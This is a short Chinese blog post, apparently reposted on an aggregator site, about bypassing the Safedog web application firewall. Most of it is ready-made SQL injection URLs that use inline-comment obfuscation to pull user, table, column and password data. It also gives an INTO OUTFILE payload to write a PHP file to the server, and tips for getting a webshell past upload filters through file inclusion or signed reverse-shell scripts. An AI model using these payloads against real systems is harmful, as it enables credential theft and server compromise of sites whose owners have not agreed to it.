首页 > 其他 > 详细

绕过安全狗【后续再更新】

时间:2020-10-06 22:01:35      阅读:66      评论:0      收藏:0      [点我收藏+]

sql绕过安全狗

技术分享图片

get->post

借助burp

内联注释(加一些东西混淆)

看回显获取用户

url.php?id=-1‘/*!50000union/*!(select*/1,2,3);
url.php?id=-1‘/*!50000union/*!(select*/~1,2,3);
url.php?id=-1‘/*!50000union/*!50000/*!(select*/~1,2,3)  
http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/~1,2,user/*!50000(*/))

获取表名

http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/~1,user/*!50000(*/),table_name from information_schema.tables where table_schema=database/*!50000(*/))

获取列名

http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/~1,user/*!50000(*/),column_name from information_schema.columns where table_name=’users’)

获取数据

http://127.0.0.1/killdog/dog.php?id=-1/*!12322union/*!11111/*!(select*/~1,2,group_concat(username,0x7e,password)from/*!`users`*/)

Getshell

http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/1,2,’<?php phpinfo();?>’ into outfile ‘dir’)

chunked编码(分割)

burp功能


上传绕过安全狗

方法1:

php/asp/aspx/jsp 通用需要借助文件包含(不管是自己构造还是系统就有)

将大马写到txt文件中,命名为dama.txt,再新建一个文本

asp的写入<!-#include file="dama.txt"-> 保存,两文件放到同目录下,反问url/x.asp,然后访问即可

php的写入<?php require_once(dama.txt);?>

方法2:

有的安全狗不是识别内容,而是识别签名,可以使用工具将自己的脚本或者反弹shell的脚本加上签名,就可以绕过。

后面在继续更新。。。

绕过安全狗【后续再更新】

原文:https://www.cnblogs.com/forforever/p/13773995.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!